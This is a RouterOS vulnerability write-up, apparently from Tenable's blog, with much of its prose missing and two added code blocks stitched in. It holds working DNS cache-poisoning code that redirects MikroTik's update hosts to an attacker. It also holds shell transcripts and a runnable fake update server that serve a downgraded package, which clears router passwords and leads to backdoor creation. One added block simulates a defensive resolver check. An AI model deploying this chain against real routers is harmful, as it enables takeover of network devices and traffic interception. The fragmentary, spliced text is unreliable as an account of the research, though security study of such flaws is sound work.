Tenable TechBlog

RouterOS: Chain to Root

DNS Request to a Root Busybox Shell

Unauthenticated DNS Requests

Requesting 8.8.8.8 to resolve google.com via the command line
The vtable for resolver’s main handler.
U6 contains the resolved IP address

DNS Cache Poisoning

from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    # Parse the router's query and answer it with our own address for whatever name it asked about.
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()
from dnslib import DNSRecord, DNSHeader, RR, A

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    # Answer records for names the router never asked about. The resolver caches
    # them next to the real answer, with a one-week TTL, so MikroTik's update and
    # cloud hosts now resolve to the attacker for every client behind the router.
    reply.add_answer(RR("upgrade.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()
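The dnslib handlers above only work because the router caches every answer record in the reply, whether or not it relates to the question. The following is an added example, not code from the Tenable post, written in pure standard-library Python: it constructs the same poisoned reply in raw wire format and contrasts a resolver that caches every answer RR with one that keeps only records whose owner name matches the question (a simplified form of the bailiwick rule real resolvers apply). The wire-format builder and parser, the transaction ID 0x1234 and the sample reply are all constructed here.

```python
"""Why the extra answers poison the cache, and the check that stops it."""
import struct

A_TYPE, IN_CLASS = 1, 1


def encode_name(name):
    """Encode a dotted name as DNS labels, e.g. b'\\x06google\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, off):
    """Decode a (possibly compressed) name at `off`; return (name, next_off)."""
    labels = []
    while True:
        length = data[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            suffix, _ = decode_name(data, ptr)
            labels.append(suffix)
            return ".".join(labels), off + 2
        labels.append(data[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def build_reply(txid, qname, answers):
    """Build a response with flags QR|AA|RA (dnslib's qr=1, aa=1, ra=1 above).

    `answers` is a list of (owner_name, ttl, ipv4) A records. Owners equal to
    the question name are written as a pointer to the question (offset 12),
    as real servers do, so the parser's pointer path is exercised.
    """
    header = struct.pack("!HHHHHH", txid, 0x8480, 1, len(answers), 0, 0)
    question = encode_name(qname) + struct.pack("!HH", A_TYPE, IN_CLASS)
    body = b""
    for owner, ttl, ip in answers:
        owner_bytes = b"\xc0\x0c" if owner == qname else encode_name(owner)
        rdata = bytes(int(o) for o in ip.split("."))
        body += owner_bytes + struct.pack("!HHIH", A_TYPE, IN_CLASS, ttl, len(rdata)) + rdata
    return header + question + body


def parse_reply(data):
    """Return (txid, first_question_name, [(owner, ttl, ipv4), ...]) for A answers."""
    txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    qname = ""
    for i in range(qdcount):
        name, off = decode_name(data, off)
        off += 4  # QTYPE, QCLASS
        if i == 0:
            qname = name
    answers = []
    for _ in range(ancount):
        owner, off = decode_name(data, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == A_TYPE and rdlen == 4:
            answers.append((owner.lower(), ttl, ".".join(str(b) for b in rdata)))
    return txid, qname.lower(), answers


def cache_from_reply(data, expected_txid, strict):
    """Simulate what a stub resolver inserts into its cache from one reply.

    strict=False caches every answer RR, the behaviour the poisoned reply
    relies on. strict=True drops records whose owner differs from the
    question name, so the mikrotik.com entries never reach the cache.
    """
    txid, qname, answers = parse_reply(data)
    if txid != expected_txid:
        return {}  # not a reply to our outstanding query
    cache = {}
    for owner, ttl, ip in answers:
        if strict and owner != qname:
            continue
        cache[owner] = (ip, ttl)
    return cache


# Constructed reply equivalent to the second dnslib handler above.
POISON_REPLY = build_reply(0x1234, "google.com", [
    ("google.com", 30, "192.168.88.250"),
    ("upgrade.mikrotik.com", 604800, "192.168.88.250"),
    ("cloud.mikrotik.com", 604800, "192.168.88.250"),
    ("cloud2.mikrotik.com", 604800, "192.168.88.250"),
    ("download.mikrotik.com", 604800, "192.168.88.250"),
])

if __name__ == "__main__":
    print("permissive:", cache_from_reply(POISON_REPLY, 0x1234, strict=False))
    print("strict:    ", cache_from_reply(POISON_REPLY, 0x1234, strict=True))
```

The strict branch keeps only exact matches on the question name; a production resolver instead keeps records inside the bailiwick of the server it asked, which is a broader rule, but the point is the same: nothing about an answer section makes its records trustworthy for names you did not query. The transaction-ID check is there because it is the only binding between a query and a reply on plain UDP; the RouterOS resolver is not the one sending the query here, so poisoning does not even need to win that race.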

Downgrade Attack

albinolobster@ubuntu:~$ curl http://upgrade.mikrotik.com/routeros/LATEST.6
6.45.6 1568106391
* Connection #0 to host upgrade.mikrotik.com left intact
albinolobster@ubuntu:~$ curl http://upgrade.mikrotik.com/routeros/6.45.6/CHANGELOG
What's new in 6.45.6 (2019-Sep-10 09:06):
Important note!!!
Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. Please secure your router after downgrading.
Old API authentication method will also no longer work, see documentation for new login procedure:
https://wiki.mikrotik.com/wiki/Manual:API#Initial_login
*) capsman - fixed regulatory domain information checking when doing background scan;
*) conntrack - improved system stability when using h323 helper (introduced in v6.45);
… lots more text ...
albinolobster@ubuntu:~$ mkdir routeros
albinolobster@ubuntu:~$ echo "6.45.6 1568106391" > ./routeros/LATEST.6
albinolobster@ubuntu:~$ mkdir routeros/6.45.6
albinolobster@ubuntu:~$ echo "lol" > ./routeros/6.45.6/CHANGELOG
albinolobster@ubuntu:~$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.88.1 - - [25/Sep/2019 16:10:49] "GET /routeros/LATEST.6 HTTP/1.1" 200 -
192.168.88.1 - - [25/Sep/2019 16:10:49] "GET /routeros/6.45.6/CHANGELOG HTTP/1.1" 200 -
Probably not real release notes
albinolobster@ubuntu:~$ curl http://upgrade.mikrotik.com/routeros/LATEST.6fix
6.44.5 1562236341
albinolobster@ubuntu:~$ echo "6.45.8 1562236341" > ./routeros/LATEST.6
albinolobster@ubuntu:~$ mkdir ./routeros/6.45.8
albinolobster@ubuntu:~$ cd ./routeros/6.45.8/
albinolobster@ubuntu:~/routeros/6.45.8$ echo "lol" > CHANGELOG
albinolobster@ubuntu:~/routeros/6.45.8$ curl https://download.mikrotik.com/routeros/6.41.4/routeros-mipsbe-6.41.4.npk > routeros-mipsbe-6.45.8.npk
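The transcript above stages the fake update tree by hand. What follows is an added example, not code from the Tenable post, that scripts the same thing: the router's check, as the server log shows, is two plaintext HTTP fetches (/routeros/LATEST.6 giving "<version> <timestamp>", then /routeros/<version>/CHANGELOG), and the package is staged as /routeros/<version>/routeros-<arch>-<version>.npk, so whoever answers those requests decides which file ships under the advertised version. The URL layout comes from the transcript; the version comparison is an assumption (a plain numeric tuple compare, used only to show why 6.45.8 is chosen over a router's 6.45.6), not RouterOS's actual logic.

```python
"""Fake upgrade.mikrotik.com that advertises one version and serves another."""
import http.server
import socketserver


def version_key(version):
    """'6.45.8' -> (6, 45, 8). Assumed comparison, not RouterOS's own."""
    return tuple(int(p) for p in version.split("."))


def parse_latest(text):
    """Parse a LATEST.6 body such as '6.45.6 1568106391' into (version, timestamp)."""
    version, timestamp = text.split()
    return version, int(timestamp)


def is_newer(current, advertised):
    """True when the advertised version would look like an upgrade to `current`."""
    return version_key(advertised) > version_key(current)


def build_update_tree(advertised_version, timestamp, arch, payload_npk, changelog=b"lol\n"):
    """Map request paths to response bodies, mirroring the directory tree above.

    `payload_npk` is whatever package you want installed (in the post, the
    real 6.41.4 mipsbe package); it is served under the advertised version's
    file name, which is all the router goes by.
    """
    base = f"/routeros/{advertised_version}"
    return {
        "/routeros/LATEST.6": f"{advertised_version} {timestamp}\n".encode(),
        f"{base}/CHANGELOG": changelog,
        f"{base}/routeros-{arch}-{advertised_version}.npk": payload_npk,
    }


class FakeUpdateHandler(http.server.BaseHTTPRequestHandler):
    tree = {}  # filled in by serve()

    def do_GET(self):
        body = self.tree.get(self.path)
        if body is None:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(tree, port=80):
    """Serve the tree on all interfaces; port 80 needs root, like SimpleHTTPServer above."""
    FakeUpdateHandler.tree = tree
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("0.0.0.0", port), FakeUpdateHandler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    import sys
    # Usage: sudo python3 fake_update.py routeros-mipsbe-6.41.4.npk
    # Advertise 6.45.8 (newer than a router on 6.45.6) but ship the given file.
    with open(sys.argv[1], "rb") as f:
        payload = f.read()
    assert is_newer("6.45.6", "6.45.8")
    serve(build_update_tree("6.45.8", 1562236341, "mipsbe", payload))
```

Point this at the poisoned router (upgrade.mikrotik.com and download.mikrotik.com both resolve to the attacker after the DNS step) and the router fetches LATEST.6, the changelog and then the package it was told is 6.45.8. Nothing in this exchange is authenticated: no TLS, and no comparison between the version the router was promised and the version the package actually carries.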

Password Reset

Important note!!!
Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. Please secure your router after downgrading.
Old API authentication method will also no longer work, see documentation for new login procedure:
https://wiki.mikrotik.com/wiki/Manual:API#Initial_login

Backdoor Creation

Video is a bit long due to the time it takes to apply an “upgrade.”

Bonus Vulnerability: More Backdoor Creation

albinolobster@ubuntu:~/routeros/ls_npk/build$ ./ls_npk -f ~/packages/6.45.5/all_packages-x86-6.45.5/advanced-tools-6.45.5.npk 
total size: 295802
-----------
0: (1) part info, size = 36, offset = 8 -> advanced-tools
1: (24) channel, size = 6, offset = 2c
2: (16) architecture, size = 4, offset = 32
3: (2) part description, size = 51, offset = 36
4: (23) digest, size = 40, offset = 69
5: (3) dependencies, size = 34, offset = 91
6: (22) zero padding, size = 3869, offset = b3
7: (21) squashfs block, size = 114688, offset = fd0
8: (4) file container, size = 176931, offset = 1cfd0
9: (9) signature, size = 68, offset = 482f3
sha1: 0e576b24d3de5280d6954217761a9fdeea6232b4
  1. 16 bytes of name
  2. 4 bytes of version
  3. 4 bytes of timestamp

A Conclusion of Sorts
